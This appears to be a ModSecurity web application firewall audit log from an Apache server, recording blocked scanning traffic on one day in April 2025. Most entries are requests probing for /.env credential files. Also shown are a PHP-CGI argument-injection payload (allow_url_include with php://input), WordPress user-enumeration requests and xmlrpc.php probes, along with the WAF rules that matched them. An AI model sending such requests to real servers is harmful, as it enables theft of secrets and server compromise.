[26/Apr/2025:15:14:05 +0700] aAyVzXGCMLWH05JCdxwqlgAAAJg 103.236.140.4 36442 103.236.140.4 8181
--909e456a-B--
GET /.env HTTP/1.0
Host: vinic.twilightparadox.com
X-Real-IP: 207.154.197.113
X-Forwarded-Host: vinic.twilightparadox.com
X-Forwarded-Server: vinic.twilightparadox.com
X-Forwarded-For: 207.154.197.113
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--909e456a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--909e456a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745655245090814 799 (- - -)
Stopwatch2: 1745655245090814 799; combined=309, p1=272, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--909e456a-Z--
--c94d790b-A--
[26/Apr/2025:15:58:15 +0700] aAygJ9DEbIDiBZnoTx5YSgAAAEs 103.236.140.4 46504 103.236.140.4 8181
--c94d790b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 161.35.4.63
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 161.35.4.63
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--c94d790b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c94d790b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745657895923778 766 (- - -)
Stopwatch2: 1745657895923778 766; combined=336, p1=287, p2=0, p3=0, p4=0, p5=49, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c94d790b-Z--
--a4aefe15-A--
[26/Apr/2025:16:08:41 +0700] aAyimdDEbIDiBZnoTx5Y2QAAAE8 103.236.140.4 48954 103.236.140.4 8181
--a4aefe15-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 206.81.12.187
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 206.81.12.187
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--a4aefe15-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a4aefe15-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745658521120901 830 (- - -)
Stopwatch2: 1745658521120901 830; combined=323, p1=289, p2=0, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a4aefe15-Z--
--29ae5a06-A--
[26/Apr/2025:16:18:14 +0700] aAyk1nGCMLWH05JCdxwurAAAAIA 103.236.140.4 51268 103.236.140.4 8181
--29ae5a06-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.80.2
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.80.2
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 AOL/11.0 AOLBUILD/11.0.1305 Safari/537.36
Accept-Charset: utf-8
--29ae5a06-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--29ae5a06-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745659094980842 12905 (- - -)
Stopwatch2: 1745659094980842 12905; combined=24503, p1=277, p2=0, p3=0, p4=0, p5=12134, sr=74, sw=0, l=0, gc=12092
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--29ae5a06-Z--
--5c120458-A--
[26/Apr/2025:16:23:01 +0700] aAyl9XGCMLWH05JCdxwu4AAAAJM 103.236.140.4 52366 103.236.140.4 8181
--5c120458-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.88.89
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.88.89
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3829.0 Safari/537.36 Edg/77.0.197.1
Accept-Charset: utf-8
--5c120458-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5c120458-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745659381779575 766 (- - -)
Stopwatch2: 1745659381779575 766; combined=327, p1=286, p2=0, p3=0, p4=0, p5=41, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5c120458-Z--
--f99f4b4f-A--
[26/Apr/2025:16:23:08 +0700] aAyl_HGCMLWH05JCdxwu5QAAAII 103.236.140.4 52396 103.236.140.4 8181
--f99f4b4f-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.88.89
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.88.89
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24
Accept-Charset: utf-8
--f99f4b4f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f99f4b4f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745659388681350 768 (- - -)
Stopwatch2: 1745659388681350 768; combined=319, p1=281, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f99f4b4f-Z--
--301ebd52-A--
[26/Apr/2025:16:53:39 +0700] aAytI3GCMLWH05JCdxwwsQAAAIQ 103.236.140.4 59542 103.236.140.4 8181
--301ebd52-B--
GET /.env HTTP/1.0
Host: archiexnz.chickenkiller.com
X-Real-IP: 64.227.32.66
X-Forwarded-Host: archiexnz.chickenkiller.com
X-Forwarded-Server: archiexnz.chickenkiller.com
X-Forwarded-For: 64.227.32.66
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--301ebd52-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--301ebd52-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745661219707000 946 (- - -)
Stopwatch2: 1745661219707000 946; combined=420, p1=375, p2=0, p3=0, p4=0, p5=44, sr=150, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--301ebd52-Z--
--e398b455-A--
[26/Apr/2025:17:50:48 +0700] aAy6iHGCMLWH05JCdxwzigAAAJc 103.236.140.4 44566 103.236.140.4 8181
--e398b455-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (MSIE 9.0; Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14931
Accept-Charset: utf-8
--e398b455-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e398b455-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745664648301756 799 (- - -)
Stopwatch2: 1745664648301756 799; combined=377, p1=322, p2=0, p3=0, p4=0, p5=55, sr=121, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e398b455-Z--
--872e4e65-A--
[26/Apr/2025:17:54:41 +0700] aAy7cXGCMLWH05JCdxwzuwAAAIE 103.236.140.4 45454 103.236.140.4 8181
--872e4e65-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 45.144.212.193
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.144.212.193
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
Accept: */*
--872e4e65-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--872e4e65-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745664881929929 716 (- - -)
Stopwatch2: 1745664881929929 716; combined=258, p1=225, p2=0, p3=0, p4=0, p5=32, sr=61, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--872e4e65-Z--
--3666a176-A--
[26/Apr/2025:18:04:12 +0700] aAy9rNDEbIDiBZnoTx5fnwAAAFg 103.236.140.4 47780 103.236.140.4 8181
--3666a176-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
Accept-Charset: utf-8
--3666a176-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3666a176-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745665452486202 891 (- - -)
Stopwatch2: 1745665452486202 891; combined=349, p1=308, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3666a176-Z--
--b150ce12-A--
[26/Apr/2025:18:04:56 +0700] aAy92E3IXD9XJ6lrmIX_owAAABM 103.236.140.4 47952 103.236.140.4 8181
--b150ce12-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1)
Accept-Charset: utf-8
--b150ce12-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b150ce12-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745665496357436 791 (- - -)
Stopwatch2: 1745665496357436 791; combined=298, p1=262, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b150ce12-Z--
--da729150-A--
[26/Apr/2025:18:10:15 +0700] aAy_F3GCMLWH05JCdxw0QAAAAJg 103.236.140.4 49162 103.236.140.4 8181
--da729150-B--
POST /?%ADd+allow_url_include%3D1+-d+auto_prepend_file%3Dphp://input HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 112.215.146.98
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 112.215.146.98
X-Forwarded-Proto: https
Connection: close
Content-Length: 36
User-Agent: python-requests/2.28.2
Accept: */*
--da729150-C--
;echo 1337; die;
--da729150-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--da729150-E--
--da729150-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||smkn22-jkt.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 -d auto_prepend_file=php://input: \xadd allow_url_include=1 -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745665815171468 3958 (- - -)
Stopwatch2: 1745665815171468 3958; combined=2350, p1=445, p2=1872, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--da729150-Z--
--76b93e40-A--
[26/Apr/2025:18:16:31 +0700] aAzAj9Q6lpQjDvc0F_PF8QAAAMc 103.236.140.4 50636 103.236.140.4 8181
--76b93e40-B--
GET /.env HTTP/1.0
Host: archiexnz.chickenkiller.com
X-Real-IP: 128.199.182.152
X-Forwarded-Host: archiexnz.chickenkiller.com
X-Forwarded-Server: archiexnz.chickenkiller.com
X-Forwarded-For: 128.199.182.152
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--76b93e40-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--76b93e40-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745666191242845 779 (- - -)
Stopwatch2: 1745666191242845 779; combined=308, p1=271, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--76b93e40-Z--
--4b073c35-A--
[26/Apr/2025:18:26:42 +0700] aAzC8k3IXD9XJ6lrmIUBLgAAABU 103.236.140.4 52972 103.236.140.4 8181
--4b073c35-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.175
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.175
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept-Charset: utf-8
--4b073c35-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4b073c35-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745666802891681 953 (- - -)
Stopwatch2: 1745666802891681 953; combined=428, p1=384, p2=0, p3=0, p4=0, p5=43, sr=80, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4b073c35-Z--
--dd801227-A--
[26/Apr/2025:18:38:53 +0700] aAzFzdDEbIDiBZnoTx5g5AAAAFc 103.236.140.4 55784 103.236.140.4 8181
--dd801227-B--
GET /.env HTTP/1.0
Host: vinic.twilightparadox.com
X-Real-IP: 206.189.233.36
X-Forwarded-Host: vinic.twilightparadox.com
X-Forwarded-Server: vinic.twilightparadox.com
X-Forwarded-For: 206.189.233.36
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--dd801227-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dd801227-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745667533328921 871 (- - -)
Stopwatch2: 1745667533328921 871; combined=382, p1=345, p2=0, p3=0, p4=0, p5=37, sr=133, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dd801227-Z--
--e8f45c65-A--
[26/Apr/2025:19:17:01 +0700] aAzOvdDEbIDiBZnoTx5jWgAAAFg 103.236.140.4 37860 103.236.140.4 8181
--e8f45c65-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.179.143
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.179.143
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--e8f45c65-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e8f45c65-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745669821169256 3591 (- - -)
Stopwatch2: 1745669821169256 3591; combined=1510, p1=485, p2=994, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e8f45c65-Z--
--2ad50128-A--
[26/Apr/2025:19:17:03 +0700] aAzOv9Q6lpQjDvc0F_PJHgAAAMo 103.236.140.4 37872 103.236.140.4 8181
--2ad50128-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.179.143
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.179.143
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--2ad50128-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2ad50128-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745669823549004 2779 (- - -)
Stopwatch2: 1745669823549004 2779; combined=1229, p1=428, p2=772, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2ad50128-Z--
--733f2a61-A--
[26/Apr/2025:19:17:05 +0700] aAzOwU3IXD9XJ6lrmIUGxQAAABA 103.236.140.4 37884 103.236.140.4 8181
--733f2a61-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.179.143
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.179.143
X-Forwarded-Proto: http
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--733f2a61-C--
demo.sayHello
--733f2a61-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--733f2a61-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745669825949992 5233 (- - -)
Stopwatch2: 1745669825949992 5233; combined=3963, p1=550, p2=3207, p3=22, p4=24, p5=93, sr=137, sw=67, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--733f2a61-Z--
--d64dc016-A--
[26/Apr/2025:19:17:22 +0700] aAzO0tDEbIDiBZnoTx5jZAAAAFc 103.236.140.4 37952 103.236.140.4 8181
--d64dc016-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.228.179.143
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.228.179.143
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--d64dc016-C--
demo.sayHello
--d64dc016-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d64dc016-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
